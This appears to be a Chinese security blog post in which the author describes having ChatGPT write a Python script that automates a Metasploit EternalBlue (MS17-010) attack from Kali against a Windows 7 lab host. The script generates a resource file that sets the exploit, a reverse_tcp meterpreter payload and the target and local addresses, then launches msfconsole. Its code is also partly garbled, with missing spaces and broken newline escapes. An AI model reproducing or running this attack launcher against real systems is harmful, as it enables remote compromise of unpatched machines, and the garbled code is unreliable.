0x01 正文
前言:
今日多云转晴,今日特别神经,偶遇一次用kali对win7的ms17010的实验,可惜的是那么多的命令在我这颗“聪明的”大脑操作下,写错了无数次,一气之下,我拿出了21世纪最让人“闻风丧胆”的神器,那就是chatgpt,有了它代码是什么?那不是汉字嘛?它就是翻译啊。
思路:
在写这个脚本前要明白,我们应该如何编写话术,首先要确定的是,gpt是需要你有一个明确的叙述才会给你一个完美的答案,我的思路就是用一个文件,里面写满我需要的操作,当然这个操作用文字表述就是:“利用kali中msf来中的ms17010”,而后呢就是在kali中我们需要打开msf啊,所以需要考虑到打开msf这个功能,然后就是在msf中按照文件的内容来执行命令。
实际效果图:
1.开启脚本后按照脚本命令执行如下图
2.会看到在脚本路径会生成一个.rc的文件如下图:
3.执行攻击完成后输入shell命令和chcp 65001来控制目标控制的输出乱码如下图:
使用chatgpt具体代码解析:
源码:
实例:
import sys
import os
import argparse
def sds(rhost, lhost):
withopen('yhzl.rc', 'w') as config:
config.write('useexploit/windows/smb/ms17_010_eternalbluen')
config.write('setpayload windows/x64/meterpreter/reverse_tcpn')
config.write(f'setRHOST {rhost}n')
config.write(f'setLHOST {lhost}n')
config.write('exploitn')
def main(args):
rhost= args.rhost
lhost= args.lhost
try:
sds(rhost,lhost)
os.system('msfconsole-r /home/yhzl.rc')
exceptException as e:
print(f'Anerror occurred: {str(e)}')
if __name__ == '__main__':
parser= argparse.ArgumentParser()
parser.add_argument('--rhost',type=str, help='Target IP address')
parser.add_argument('--lhost',type=str, help='Local IP address')
args= parser.parse_args()
main(args)
总结:
作为最新的人工智能,在使用时候确实可以方便很多,但是限制就是使用它的人对于所写内容的理解高度,之所以没有放出来话术是因为话术是不可复制的,每个人的习惯不同,所述语句也不同,没有必要模仿,反正就是一句话,玩就对了!
0x02 好书推荐
0x03 看到这里了,师傅不加个群嘛
欢迎师傅们加入我的 钟毓安全的小屋(群内添加本人好友请备注),一起学习进步~后面不定期发布更多资源,更多惊喜等着大家。
注:
1、内容来源书籍总结,及个人总结,和互联网数据若干,不存在盗用等情况;
2、壁纸来源于https://wallhaven.cc;
3、特声明,壁纸不存在低俗 引流等行为,本文重点在于共享资源;
原文始发于微信公众号(钟毓安全):Chatgpt编写msf中ms17010自动化
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论